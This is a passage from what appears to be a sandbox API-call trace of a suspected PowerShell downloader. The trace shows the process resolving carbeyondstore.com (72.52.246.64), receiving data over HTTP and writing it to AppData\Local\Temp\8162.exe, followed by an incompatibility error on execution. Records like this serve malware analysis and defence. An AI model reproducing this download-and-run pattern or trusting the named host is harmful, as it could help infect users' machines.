(in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x5fcedf8 | out: phkResult=0x5fcedf8*=0x48c) returned 0x0 [0083.316] RegQueryValueExW (in: hKey=0x48c, lpValueName="Library", lpReserved=0x0, lpType=0x5fcee40, lpData=0x0, lpcbData=0x5fcee3c*=0x0 | out: lpType=0x5fcee40*=0x1, lpData=0x0, lpcbData=0x5fcee3c*=0x1c) returned 0x0 [0083.317] RegQueryValueExW (in: hKey=0x48c, lpValueName="Library", lpReserved=0x0, lpType=0x5fcee40, lpData=0x3702f0, lpcbData=0x5fcee3c*=0x1c | out: lpType=0x5fcee40*=0x1, lpData="netfxperf.dll", lpcbData=0x5fcee3c*=0x1c) returned 0x0 [0083.317] RegQueryValueExW (in: hKey=0x48c, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x5fcee40, lpData=0x0, lpcbData=0x5fcee3c*=0x0 | out: lpType=0x5fcee40*=0x4, lpData=0x0, lpcbData=0x5fcee3c*=0x4) returned 0x0 [0083.319] RegQueryValueExW (in: hKey=0x48c, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x5fcee40, lpData=0x5fcee2c, lpcbData=0x5fcee3c*=0x4 | out: lpType=0x5fcee40*=0x4, lpData=0x5fcee2c*=0x1, lpcbData=0x5fcee3c*=0x4) returned 0x0 [0083.320] RegQueryValueExW (in: hKey=0x48c, lpValueName="First Counter", lpReserved=0x0, lpType=0x5fcee40, lpData=0x0, lpcbData=0x5fcee3c*=0x0 | out: lpType=0x5fcee40*=0x4, lpData=0x0, lpcbData=0x5fcee3c*=0x4) returned 0x0 [0083.320] RegQueryValueExW (in: hKey=0x48c, lpValueName="First Counter", lpReserved=0x0, lpType=0x5fcee40, lpData=0x5fcee2c, lpcbData=0x5fcee3c*=0x4 | out: lpType=0x5fcee40*=0x4, lpData=0x5fcee2c*=0x137a, lpcbData=0x5fcee3c*=0x4) returned 0x0 [0083.320] RegCloseKey (hKey=0x48c) returned 0x0 [0083.324] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x5fcedf4 | out: phkResult=0x5fcedf4*=0x48c) returned 0x0 [0083.324] RegQueryValueExW (in: hKey=0x48c, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x5fcee3c, lpData=0x0, lpcbData=0x5fcee38*=0x0 | out: lpType=0x5fcee3c*=0x4, lpData=0x0, lpcbData=0x5fcee38*=0x4) returned 0x0 [0083.324] RegQueryValueExW (in: hKey=0x48c, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x5fcee3c, lpData=0x5fcee28, lpcbData=0x5fcee38*=0x4 | out: lpType=0x5fcee3c*=0x4, lpData=0x5fcee28*=0x3, lpcbData=0x5fcee38*=0x4) returned 0x0 [0083.324] RegQueryValueExW (in: hKey=0x48c, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x5fcee3c, lpData=0x0, lpcbData=0x5fcee38*=0x0 | out: lpType=0x5fcee3c*=0x4, lpData=0x0, lpcbData=0x5fcee38*=0x4) returned 0x0 [0083.324] RegQueryValueExW (in: hKey=0x48c, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x5fcee3c, lpData=0x5fcee28, lpcbData=0x5fcee38*=0x4 | out: lpType=0x5fcee3c*=0x4, lpData=0x5fcee28*=0x20000, lpcbData=0x5fcee38*=0x4) returned 0x0 [0083.325] RegQueryValueExW (in: hKey=0x48c, lpValueName="Counter Names", lpReserved=0x0, lpType=0x5fcee3c, lpData=0x0, lpcbData=0x5fcee38*=0x0 | out: lpType=0x5fcee3c*=0x3, lpData=0x0, lpcbData=0x5fcee38*=0xaa) returned 0x0 [0083.325] RegQueryValueExW (in: hKey=0x48c, lpValueName="Counter Names", lpReserved=0x0, lpType=0x5fcee3c, lpData=0x2c73bb4, lpcbData=0x5fcee38*=0xaa | out: lpType=0x5fcee3c*=0x3, lpData=0x2c73bb4*, lpcbData=0x5fcee38*=0xaa) returned 0x0 [0083.331] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0083.337] GetLastError () returned 0x0 [0083.342] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x354528, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x490 [0083.342] GetLastError () returned 0x0 [0083.346] MapViewOfFile (hFileMappingObject=0x490, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x4a80000 [0083.349] LocalFree (hMem=0x368ba0) returned 0x0 [0083.349] RegCloseKey (hKey=0x48c) returned 0x0 [0083.350] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2c7461c, cbSid=0x5fcedec | out: pSid=0x2c7461c, cbSid=0x5fcedec) returned 1 [0083.350] GetLastError () returned 0x0 [0083.351] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2c74928, cbSid=0x5fcedac | out: pSid=0x2c74928, cbSid=0x5fcedac) returned 1 [0083.351] GetLastError () returned 0x0 [0083.352] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2c7531c, cbSid=0x5fcedec | out: pSid=0x2c7531c, cbSid=0x5fcedec) returned 1 [0083.352] GetLastError () returned 0x5 [0083.353] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2c75ba0, cbSid=0x5fcedec | out: pSid=0x2c75ba0, cbSid=0x5fcedec) returned 1 [0083.353] GetLastError () returned 0x0 [0083.354] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2c76428, cbSid=0x5fcedec | out: pSid=0x2c76428, cbSid=0x5fcedec) returned 1 [0083.354] GetLastError () returned 0x0 [0083.355] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2c76ca8, cbSid=0x5fcedec | out: pSid=0x2c76ca8, cbSid=0x5fcedec) returned 1 [0083.355] GetLastError () returned 0x0 [0083.356] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2c77524, cbSid=0x5fcede4 | out: pSid=0x2c77524, cbSid=0x5fcede4) returned 1 [0083.356] GetLastError () returned 0x0 [0083.356] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2c77dac, cbSid=0x5fcede4 | out: pSid=0x2c77dac, cbSid=0x5fcede4) returned 1 [0083.356] GetLastError () returned 0x0 [0083.357] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2c78610, cbSid=0x5fcede4 | out: pSid=0x2c78610, cbSid=0x5fcede4) returned 1 [0083.357] GetLastError () returned 0x0 [0083.358] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2c78e84, cbSid=0x5fcede4 | out: pSid=0x2c78e84, cbSid=0x5fcede4) returned 1 [0083.358] GetLastError () returned 0x0 [0083.359] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2c796f0, cbSid=0x5fcede4 | out: pSid=0x2c796f0, cbSid=0x5fcede4) returned 1 [0083.359] GetLastError () returned 0x0 [0083.363] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x48c [0083.363] GetLastError () returned 0x0 [0083.364] ioctlsocket (in: s=0x48c, cmd=-2147195266, argp=0x5fcf030 | out: argp=0x5fcf030) returned 0 [0083.364] GetLastError () returned 0x0 [0083.723] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x498 [0083.723] GetLastError () returned 0x0 [0083.724] ioctlsocket (in: s=0x498, cmd=-2147195266, argp=0x5fcf030 | out: argp=0x5fcf030) returned 0 [0083.724] GetLastError () returned 0x0 [0083.724] WSAIoctl (in: s=0x48c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x5fcf014, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x5fcf014, lpOverlapped=0x0) returned -1 [0083.724] GetLastError () returned 0x2733 [0083.741] WSAEventSelect (s=0x48c, hEventObject=0x494, lNetworkEvents=512) returned 0 [0083.741] GetLastError () returned 0x0 [0083.742] WSAIoctl (in: s=0x498, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x5fcf014, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x5fcf014, lpOverlapped=0x0) returned -1 [0083.742] GetLastError () returned 0x2733 [0083.744] WSAEventSelect (s=0x498, hEventObject=0x49c, lNetworkEvents=512) returned 0 [0083.744] GetLastError () returned 0x0 [0083.744] RasConnectionNotificationW (param_1=0xffffffff, param_2=0x4a0, param_3=0x3) returned 0x0 [0083.756] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x5fceff8 | out: phkResult=0x5fceff8*=0x4b8) returned 0x0 [0083.756] GetLastError () returned 0x0 [0083.761] RegOpenKeyExW (in: hKey=0x4b8, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x5fcefb4 | out: phkResult=0x5fcefb4*=0x4bc) returned 0x0 [0083.761] GetLastError () returned 0x0 [0083.761] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4c0 [0083.761] GetLastError () returned 0x0 [0083.764] RegNotifyChangeKeyValue (hKey=0x4bc, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x4c0, fAsynchronous=1) returned 0x0 [0083.764] GetLastError () returned 0x0 [0083.767] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x5fcefb4 | out: phkResult=0x5fcefb4*=0x4c4) returned 0x0 [0083.767] GetLastError () returned 0x0 [0083.767] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4c8 [0083.767] GetLastError () returned 0x0 [0083.767] RegNotifyChangeKeyValue (hKey=0x4c4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x4c8, fAsynchronous=1) returned 0x0 [0083.767] GetLastError () returned 0x0 [0083.768] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x5fcefb4 | out: phkResult=0x5fcefb4*=0x4cc) returned 0x0 [0083.768] GetLastError () returned 0x0 [0083.768] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4d0 [0083.768] GetLastError () returned 0x0 [0083.768] RegNotifyChangeKeyValue (hKey=0x4cc, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x4d0, fAsynchronous=1) returned 0x0 [0083.768] GetLastError () returned 0x0 [0083.768] GetCurrentProcess () returned 0xffffffff [0083.769] GetLastError () returned 0x3f0 [0083.769] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fcef9c | out: TokenHandle=0x5fcef9c*=0x4d4) returned 1 [0083.769] GetLastError () returned 0x3f0 [0083.785] GetCurrentProcess () returned 0xffffffff [0083.785] GetLastError () returned 0x3f0 [0083.785] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fcebb8 | out: TokenHandle=0x5fcebb8*=0x4e8) returned 1 [0083.785] GetLastError () returned 0x3f0 [0083.790] GetCurrentProcess () returned 0xffffffff [0083.790] GetLastError () returned 0x3f0 [0083.790] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fcebc8 | out: TokenHandle=0x5fcebc8*=0x4ec) returned 1 [0083.790] GetLastError () returned 0x3f0 [0083.848] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x3544f8 | out: pProxyConfig=0x3544f8) returned 1 [0084.263] GetLastError () returned 0x0 [0084.281] WinHttpDetectAutoProxyConfigUrl (in: dwAutoDetectFlags=0x1, ppwstrAutoConfigUrl=0x5fcef50 | out: ppwstrAutoConfigUrl=0x5fcef50*=0x0) returned 0 [0084.357] GetLastError () returned 0x2f94 [0084.357] WinHttpDetectAutoProxyConfigUrl (in: dwAutoDetectFlags=0x2, ppwstrAutoConfigUrl=0x5fcef50 | out: ppwstrAutoConfigUrl=0x5fcef50*=0x0) returned 0 [0087.203] GetLastError () returned 0x2f94 [0087.206] GetCurrentProcess () returned 0xffffffff [0087.207] GetLastError () returned 0x3f0 [0087.207] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fcebf0 | out: TokenHandle=0x5fcebf0*=0x540) returned 1 [0087.207] GetLastError () returned 0x3f0 [0087.209] GetCurrentProcess () returned 0xffffffff [0087.209] GetLastError () returned 0x3f0 [0087.209] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fcec00 | out: TokenHandle=0x5fcec00*=0x514) returned 1 [0087.209] GetLastError () returned 0x3f0 [0087.210] SetEvent (hEvent=0x428) returned 1 [0087.210] GetLastError () returned 0x3f0 [0087.239] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x5fcef50 | out: pFixedInfo=0x0, pOutBufLen=0x5fcef50) returned 0x6f [0087.312] LocalAlloc (uFlags=0x0, uBytes=0x248) returned 0x37f468 [0087.312] GetLastError () returned 0x0 [0087.312] GetNetworkParams (in: pFixedInfo=0x37f468, pOutBufLen=0x5fcef50 | out: pFixedInfo=0x37f468, pOutBufLen=0x5fcef50) returned 0x0 [0087.390] inet_addr (cp="192.168.0.1") returned 0x100a8c0 [0087.390] GetLastError () returned 0x0 [0087.399] LocalFree (hMem=0x37f468) returned 0x0 [0087.399] GetLastError () returned 0x0 [0087.405] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x54c [0087.406] GetLastError () returned 0x0 [0087.407] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x548 [0087.407] GetLastError () returned 0x0 [0087.418] getaddrinfo (in: pNodeName="carbeyondstore.com", pServiceName=0x0, pHints=0x5fcee2c*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x5fcebc0 | out: ppResult=0x5fcebc0*=0x6433540*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="carbeyondstore.com", ai_addr=0x6431420*(sa_family=2, sin_port=0x0, sin_addr="72.52.246.64"), ai_next=0x0)) returned 0 [0094.368] GetLastError () returned 0x0 [0094.370] FreeAddrInfoW (pAddrInfo=0x6433540*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="慣扲祥湯獤潴敲挮浯", ai_addr=0x6431420*(sa_family=2, sin_port=0x0, sin_addr="72.52.246.64"), ai_next=0x0)) [0094.370] GetLastError () returned 0x0 [0094.372] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x550 [0094.372] GetLastError () returned 0x0 [0094.372] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x55c [0094.372] GetLastError () returned 0x0 [0094.373] ioctlsocket (in: s=0x550, cmd=-2147195266, argp=0x5fcee10 | out: argp=0x5fcee10) returned 0 [0094.373] GetLastError () returned 0x0 [0094.373] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x560 [0094.373] GetLastError () returned 0x0 [0094.374] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x564 [0094.374] GetLastError () returned 0x0 [0094.374] ioctlsocket (in: s=0x560, cmd=-2147195266, argp=0x5fcee10 | out: argp=0x5fcee10) returned 0 [0094.374] GetLastError () returned 0x0 [0094.374] WSAIoctl (in: s=0x550, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x5fcedf4, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x5fcedf4, lpOverlapped=0x0) returned -1 [0094.374] GetLastError () returned 0x2733 [0094.374] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x3702f0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0094.374] GetLastError () returned 0x2733 [0094.375] WSAEventSelect (s=0x550, hEventObject=0x55c, lNetworkEvents=512) returned 0 [0094.375] GetLastError () returned 0x0 [0094.375] WSAIoctl (in: s=0x560, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x5fcedf4, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x5fcedf4, lpOverlapped=0x0) returned -1 [0094.375] GetLastError () returned 0x2733 [0094.375] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x3702f0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0094.375] GetLastError () returned 0x2733 [0094.376] WSAEventSelect (s=0x560, hEventObject=0x564, lNetworkEvents=512) returned 0 [0094.376] GetLastError () returned 0x0 [0094.378] GetAdaptersAddresses () returned 0x6f [0094.429] LocalAlloc (uFlags=0x0, uBytes=0xaa8) returned 0x6446a90 [0094.430] GetLastError () returned 0x0 [0094.430] GetAdaptersAddresses () returned 0x0 [0094.493] LocalFree (hMem=0x6446a90) returned 0x0 [0094.493] GetLastError () returned 0x0 [0094.501] WSAConnect (in: s=0x54c, name=0x2c81338*(sa_family=2, sin_port=0x50, sin_addr="72.52.246.64"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0094.629] GetLastError () returned 0x0 [0094.630] closesocket (s=0x548) returned 0 [0094.631] GetLastError () returned 0x0 [0094.643] send (in: s=0x54c, buf=0x2c82bfc*, len=76, flags=0 | out: buf=0x2c82bfc*) returned 76 [0094.643] GetLastError () returned 0x0 [0094.647] setsockopt (s=0x54c, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0 [0094.647] GetLastError () returned 0x0 [0094.647] recv (in: s=0x54c, buf=0x2c7e37c, len=4096, flags=0 | out: buf=0x2c7e37c*) returned 340 [0095.835] GetLastError () returned 0x0 [0095.849] SetEvent (hEvent=0x428) returned 1 [0095.849] GetLastError () returned 0x0 [0095.866] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x548 [0095.866] GetLastError () returned 0x0 [0095.866] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x568 [0095.866] GetLastError () returned 0x0 [0095.867] getaddrinfo (in: pNodeName="www.carbeyondstore.com", pServiceName=0x0, pHints=0x5fcee2c*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x5fcebc0 | out: ppResult=0x5fcebc0*=0x6433478*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="www.carbeyondstore.com", ai_addr=0x6431480*(sa_family=2, sin_port=0x0, sin_addr="72.52.246.64"), ai_next=0x0)) returned 0 [0096.008] GetLastError () returned 0x0 [0096.008] FreeAddrInfoW (pAddrInfo=0x6433478*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="睷⹷慣扲祥湯獤潴敲挮浯", ai_addr=0x6431480*(sa_family=2, sin_port=0x0, sin_addr="72.52.246.64"), ai_next=0x0)) [0096.008] GetLastError () returned 0x0 [0096.009] WSAConnect (in: s=0x548, name=0x2c86c40*(sa_family=2, sin_port=0x50, sin_addr="72.52.246.64"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0096.134] GetLastError () returned 0x0 [0096.135] closesocket (s=0x568) returned 0 [0096.135] GetLastError () returned 0x0 [0096.135] send (in: s=0x548, buf=0x2c86df0*, len=72, flags=0 | out: buf=0x2c86df0*) returned 72 [0096.135] GetLastError () returned 0x0 [0096.135] setsockopt (s=0x548, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0 [0096.135] GetLastError () returned 0x0 [0096.136] recv (in: s=0x548, buf=0x2c85828, len=4096, flags=0 | out: buf=0x2c85828*) returned 587 [0097.316] GetLastError () returned 0x0 [0097.317] setsockopt (s=0x548, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0097.317] GetLastError () returned 0x0 [0097.319] WriteFile (in: hFile=0x424, lpBuffer=0x2c87998*, nNumberOfBytesToWrite=0xcf, lpNumberOfBytesWritten=0x5fcf0ac, lpOverlapped=0x0 | out: lpBuffer=0x2c87998*, lpNumberOfBytesWritten=0x5fcf0ac*=0xcf, lpOverlapped=0x0) returned 1 [0097.320] GetLastError () returned 0x0 [0097.320] CloseHandle (hObject=0x424) returned 1 [0097.321] GetLastError () returned 0x0 [0097.353] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3702f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0097.353] GetLastError () returned 0xcb [0097.380] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3702f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0097.380] GetLastError () returned 0xcb [0097.458] GetLongPathNameW (in: lpszShortPath="C:\\Users\\HJRD1K~1\\", lpszLongPath=0x5fce950, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\hJrD1KOKY DS8lUjv\\") returned 0x1b [0097.459] GetLastError () returned 0xcb [0097.459] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Local\\Temp\\8162.exe", nBufferLength=0x105, lpBuffer=0x5fce978, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Local\\Temp\\8162.exe", lpFilePart=0x0) returned 0x36 [0097.459] GetLastError () returned 0xcb [0097.459] SetErrorMode (uMode=0x1) returned 0x1 [0097.459] GetFileAttributesExW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Local\\Temp\\8162.exe", fInfoLevelId=0x0, lpFileInformation=0x2cb1e44 | out: lpFileInformation=0x2cb1e44) returned 1 [0097.459] GetLastError () returned 0xcb [0097.459] SetErrorMode (uMode=0x1) returned 0x1 [0097.460] GetLongPathNameW (in: lpszShortPath="C:\\Users\\HJRD1K~1\\", lpszLongPath=0x5fcec38, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\hJrD1KOKY DS8lUjv\\") returned 0x1b [0097.461] GetLastError () returned 0xcb [0097.461] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Local\\Temp\\8162.exe", nBufferLength=0x105, lpBuffer=0x5fcec60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Local\\Temp\\8162.exe", lpFilePart=0x0) returned 0x36 [0097.461] GetLastError () returned 0xcb [0097.461] SetErrorMode (uMode=0x1) returned 0x1 [0097.461] GetFileAttributesExW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Local\\Temp\\8162.exe", fInfoLevelId=0x0, lpFileInformation=0x5fcf0e0 | out: lpFileInformation=0x5fcf0e0) returned 1 [0097.461] GetLastError () returned 0xcb [0097.461] SetErrorMode (uMode=0x1) returned 0x1 [0097.463] GetLongPathNameW (in: lpszShortPath="C:\\Users\\HJRD1K~1\\", lpszLongPath=0x5fcec00, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\hJrD1KOKY DS8lUjv\\") returned 0x1b [0097.463] GetLastError () returned 0xcb [0097.464] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Local\\Temp\\8162.exe", nBufferLength=0x105, lpBuffer=0x5fcec28, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Local\\Temp\\8162.exe", lpFilePart=0x0) returned 0x36 [0097.464] GetLastError () returned 0xcb [0097.464] SetErrorMode (uMode=0x1) returned 0x1 [0097.464] GetFileAttributesExW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Local\\Temp\\8162.exe", fInfoLevelId=0x0, lpFileInformation=0x5fcf0a8 | out: lpFileInformation=0x5fcf0a8) returned 1 [0097.464] GetLastError () returned 0xcb [0097.464] SetErrorMode (uMode=0x1) returned 0x1 [0097.477] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3702f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0097.477] GetLastError () returned 0xcb [0097.479] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3702f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0097.479] GetLastError () returned 0xcb [0097.737] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0xd8, dwLanguageId=0x0, lpBuffer=0x3702f0, nSize=0x101, Arguments=0x0 | out: lpBuffer="This version of %1 is not compatible with the version of Windows you're running. Check your computer's system information to see whether you need a x86 (32-bit) or x64 (64-bit) version of the program, and then contact the software publisher.\r\n") returned 0xf3 [0097.737] GetLastError () returned 0x0 [0097.742] LocalFree (hMem=0x2cd2e8) returned 0x0 [0097.742] GetLastError () returned 0x0 [0097.742] LocalFree (hMem=0x2b7e10) returned 0x0 [0097.742] GetLastError () returned 0x0 [0097.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x5fcebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0097.743] GetLastError () returned 0x0 [0097.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x5fceb78, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0097.743] GetLastError () returned 0x0 [0097.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x5fceb78, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0097.743] GetLastError () returned 0x0 [0097.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x5fceb78, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0097.743] GetLastError () returned 0x0 [0097.876] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3702f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0097.876] GetLastError () returned 0xcb [0097.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5fceb48, lpFilePart=0x0 | out: 